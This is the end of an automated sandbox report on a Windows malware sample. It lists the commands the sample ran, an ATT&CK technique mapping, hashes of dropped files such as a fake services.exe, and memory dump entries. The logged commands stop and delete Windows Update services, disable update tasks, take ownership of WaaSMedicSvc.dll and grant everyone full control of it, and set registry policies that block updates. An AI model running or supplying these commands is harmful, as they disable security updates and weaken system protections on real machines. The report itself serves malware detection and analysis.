/TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:196

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:160

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:1664

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:2224

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:2200

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:1808

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4048

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:2176

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:3464

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:3812

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:2848

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:872

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1108

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:644

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2352

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1752

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:3816

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:2660

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:2568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:2728

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:3824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4060

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:1344

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "jgimrcmwq"
4⤵
PID:3376

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows\services.exe
Filesize
5.3MB

MD5
52fdd7f3ed1b50bc5794983a37cb4064

SHA1
4a185751e9e94dccb3330ca79f893de7ca080482

SHA256
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

SHA512
4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

Download Submit
C:\Program Files\Windows\services.exe
Filesize
5.3MB

MD5
52fdd7f3ed1b50bc5794983a37cb4064

SHA1
4a185751e9e94dccb3330ca79f893de7ca080482

SHA256
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

SHA512
4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
539B

MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
memory/160-360-0x0000000000000000-mapping.dmp

Download
memory/188-173-0x0000000000000000-mapping.dmp

Download
memory/192-171-0x0000000000000000-mapping.dmp

Download
memory/196-359-0x0000000000000000-mapping.dmp

Download
memory/220-219-0x0000000000000000-mapping.dmp

Download
memory/224-218-0x0000000000000000-mapping.dmp

Download
memory/232-170-0x0000000000000000-mapping.dmp

Download
memory/320-172-0x0000000000000000-mapping.dmp

Download
memory/512-184-0x0000000000000000-mapping.dmp

Download
memory/644-380-0x0000000000000000-mapping.dmp

Download
memory/872-372-0x0000000000000000-mapping.dmp

Download
memory/1020-137-0x00000196C4610000-0x00000196C4632000-memory.dmp

Filesize
136KB

Download
memory/1020-140-0x00000196C4810000-0x00000196C4886000-memory.dmp

Filesize
472KB

Download
memory/1020-132-0x0000000000000000-mapping.dmp

Download
memory/1020-216-0x0000000000000000-mapping.dmp

Download
memory/1108-379-0x0000000000000000-mapping.dmp

Download
memory/1108-182-0x0000000000000000-mapping.dmp

Download
memory/1148-390-0x000002522CB20000-0x000002522CB32000-memory.dmp

Filesize
72KB

Download
memory/1148-368-0x000002522CAF0000-0x000002522CAF6000-memory.dmp

Filesize
24KB

Download
memory/1340-183-0x0000000000000000-mapping.dmp

Download
memory/1344-374-0x0000000000401BEA-mapping.dmp

Download
memory/1344-378-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1344-373-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1352-117-0x0000000000400000-0x0000000000C91000-memory.dmp

Filesize
8.6MB

Download
memory/1368-201-0x0000000000000000-mapping.dmp

Download
memory/1568-387-0x0000000000000000-mapping.dmp

Download
memory/1632-189-0x0000000000400000-0x0000000000C91000-memory.dmp

Filesize
8.6MB

Download
memory/1664-361-0x0000000000000000-mapping.dmp

Download
memory/1688-214-0x0000000000000000-mapping.dmp

Download
memory/1752-382-0x0000000000000000-mapping.dmp

Download
memory/1808-364-0x0000000000000000-mapping.dmp

Download
memory/1812-178-0x0000000000000000-mapping.dmp

Download
memory/1820-169-0x0000000000000000-mapping.dmp

Download
memory/1928-122-0x000002128A6F0000-0x000002128A8CD000-memory.dmp

Filesize
1.9MB

Download
memory/1928-124-0x00000212A51F0000-0x00000212A53CC000-memory.dmp

Filesize
1.9MB

Download
memory/2136-215-0x0000000000000000-mapping.dmp

Download
memory/2176-366-0x0000000000000000-mapping.dmp

Download
memory/2200-363-0x0000000000000000-mapping.dmp

Download
memory/2204-176-0x0000000000000000-mapping.dmp

Download
memory/2224-362-0x0000000000000000-mapping.dmp

Download
memory/2272-222-0x0000000000000000-mapping.dmp

Download
memory/2288-221-0x0000000000000000-mapping.dmp

Download
memory/2324-174-0x0000000000000000-mapping.dmp

Download
memory/2328-213-0x0000000000000000-mapping.dmp

Download
memory/2352-381-0x0000000000000000-mapping.dmp

Download
memory/2388-217-0x0000000000000000-mapping.dmp

Download
memory/2568-385-0x0000000000000000-mapping.dmp

Download
memory/2660-384-0x0000000000000000-mapping.dmp

Download
memory/2728-386-0x0000000000000000-mapping.dmp

Download
memory/2736-371-0x0000000000000000-mapping.dmp

Download
memory/2840-181-0x0000000000000000-mapping.dmp

Download
memory/2848-370-0x0000000000000000-mapping.dmp

Download
memory/3212-175-0x0000000000000000-mapping.dmp

Download
memory/3376-398-0x0000016A81980000-0x0000016A81986000-memory.dmp

Filesize
24KB

Download
memory/3376-392-0x0000016A81610000-0x0000016A81617000-memory.dmp

Filesize
28KB

Download
memory/3464-367-0x0000000000000000-mapping.dmp

Download
memory/3500-131-0x0000000000000000-mapping.dmp

Download
memory/3512-220-0x0000000000000000-mapping.dmp

Download
memory/3616-186-0x0000000000000000-mapping.dmp

Download
memory/3632-223-0x0000000000000000-mapping.dmp

Download
memory/3812-369-0x0000000000000000-mapping.dmp

Download
memory/3816-383-0x0000000000000000-mapping.dmp

Download
memory/3824-388-0x0000000000000000-mapping.dmp

Download
memory/3860-179-0x0000000000000000-mapping.dmp

Download
memory/3868-228-0x0000021E1EB70000-0x0000021E1EB8C000-memory.dmp

Filesize
112KB

Download
memory/3868-202-0x0000000000000000-mapping.dmp

Download
memory/3868-234-0x0000021E1ED50000-0x0000021E1EE09000-memory.dmp

Filesize
740KB

Download
memory/3868-267-0x0000021E1EB60000-0x0000021E1EB6A000-memory.dmp

Filesize
40KB

Download
memory/3964-180-0x0000000000000000-mapping.dmp

Download
memory/4028-177-0x0000000000000000-mapping.dmp

Download
memory/4048-365-0x0000000000000000-mapping.dmp

Download
memory/4060-389-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads